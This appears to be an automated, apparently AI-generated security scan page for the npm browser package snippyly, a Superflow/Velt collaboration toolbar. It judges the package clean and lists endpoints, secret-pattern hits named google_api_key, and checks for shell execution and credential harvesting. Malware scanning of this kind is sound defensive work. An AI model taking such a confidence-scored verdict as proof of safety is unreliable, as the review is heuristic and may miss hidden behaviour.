AI Security Review
scanned 4d ago · by lpm-firewall-aiNo confirmed malicious attack surface. The package is a browser toolbar/custom-element plugin that loads aligned SDK assets and calls Superflow/Velt/Firebase services when a page embeds or configures it.
Static reason
One or more suspicious static signals were detected.
Trigger
Browser import or script inclusion with SUPERFLOW/snippyly configuration
Impact
Expected networked collaboration toolbar behavior; no source-grounded exfiltration or install-time execution confirmed
Mechanism
browser custom element and remote SDK loader
Rationale
Static inspection shows a bundled browser plugin with expected remote SDK/service calls and no install-time execution, host filesystem access, destructive behavior, credential harvesting, or unrelated exfiltration. Scanner hits are explained by bundled Firebase/Auth code, runtime toolbar configuration, and normal product endpoints.
Evidence
package.jsonsnippyly.jssnippyly.min.js
Network endpoints9
cdn.jsdelivr.net/npm/@veltdev/sdk@.../velt.jsus-central1-snipply-sdk-staging.cloudfunctions.net/getprivatenpmpackagefileapp.usesuperflow.com/assets/party-emoji.svgwww.usesuperflow.com/featuresdrive.google.com/uc?export=view&id=1QHXtKZg8I7-wIapZJDs-x8YenlHMvzP4drive.google.com/uc?export=view&id=19Q76zC8mmLXjnMoRqio6EVtfO4AoB-hmapis.google.com/js/api.jswww.google.com/recaptcha/api.jswww.google.com/recaptcha/enterprise.js?render=
Decision evidence
public snapshotAI called this Clean at 90.0% confidence as Benign with low false-positive risk.
Evidence for block
- snippyly.js loads remote Velt SDK scripts at runtime from jsdelivr or snipply staging Cloud Functions.
- snippyly.js auto-defines browser custom elements and may append a superflow-toolbar when configured with API key attributes/window variables.
- snippyly.js includes bundled Firebase/Auth code with token, storage, and fetch primitives.
Evidence against
- package.json has no install/preinstall/postinstall lifecycle hooks and main is snippyly.js.
- No child_process, shell execution, filesystem writes, native binary loading, or AI-agent control-surface writes found.
- Network use is aligned with a browser Superflow/Snippyly collaboration toolbar plugin.
- API key/password/token strings are configuration fields or bundled Firebase/Auth implementation, not hardcoded credential exfiltration.
- snippyly.min.js appears to be a minified build of the same browser plugin surface.
Behavioral surface
ChildProcessEnvironmentVarsNetwork
HighEntropyStringsMinifiedUrlStrings
Source & flagged code
3 flagged · loading sourcesnippyly.min.jsView file
1545patternName = google_api_key
severity = high
line = 1545
matchedText = calc(${t...d=a`
High
1545patternName = google_api_key
severity = high
line = 1545
matchedText = calc(${t...d=a`
High
snippyly.jsView file
1545patternName = google_api_key
severity = high
line = 1545
matchedText = calc(${t...d=r`
High
Findings
3 High2 Medium3 Low
HighHigh Secretsnippyly.min.js
HighSecret Patternsnippyly.min.js
HighSecret Patternsnippyly.js
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings